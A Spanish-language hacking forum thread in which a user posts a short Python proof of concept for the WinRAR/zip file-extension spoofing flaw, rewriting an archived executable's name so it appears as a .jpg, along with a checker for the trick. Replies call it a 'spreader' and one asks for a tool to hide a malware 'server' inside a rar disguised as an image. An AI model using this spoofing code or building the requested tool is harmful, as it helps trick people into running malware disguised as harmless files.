Comentabamos esto por skype
[Enlace externo eliminado para invitados]

Asi que me escribi algo rapidillo pa hacerlo funcional:

Código: Seleccionar todo

"""
PoC of http://thehackernews.com/2014/04/winrar-file-extension-spoofing.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29
"""
def spread(sFile, orgExt, newExt):
	f = open(sFile, 'r')
	content = f.read()
	f.close()
	
	f = open('exploited_%s' % sFile, 'w')
	f.write(content[0:len(content)-1000] + content[(len(content)-1000)::].replace(orgExt, newExt))
	f.close()


def spread_checker(compressed, sFile):
	f = open(compressed, 'r')
	content = f.read()
	f.close()
	
	if sFile in content[0:1000] and sFile in content[(len(content) - 1000)::]:
		print "la extension de %s es real" % sFile
	else:
		print "se trata de un spread"

"""
usage:
spread('builder.zip', 'exe', 'jpg')
spread_checker("exploited_builder.zip", "Buldier.exe")
"""
SuC escribió:wtf no será lo que pienso que es..??! me ausento un tiempo y sacan estas cosas sin avisar!
Si si es jajajaja, y eso que hace un tiempo en el foro habia un topic en el que buscábamos este tipo de fallos... Y en teoria no existia, o bien no buscaron bien o si lo encontraron se callaron como putas jajaja

Buena esa sanko!!
Soy un camaleón, en tu cama, leona ♪
bueeeeno, no es lo que pensaba que era xDD este es el antiguo.. por ahí hay otro que va con las últimas versiones y funciona tanto en zip como rar..
Buenisimo sanko, muchos ignoran la utilidad que tiene este script y lo que se puede hacer realmente, un saludo grande crack
Abolición para el torneo del toro de la vega. Death to the murderers of bulls.
Hola buenas, yo en vez de un spreader lo que busco es algo que al pasarle un rar y un server meta el server en el rar con formato jpg. Hay algo por ahí?? Muchas gracias.
Responder

Volver a “Fuentes”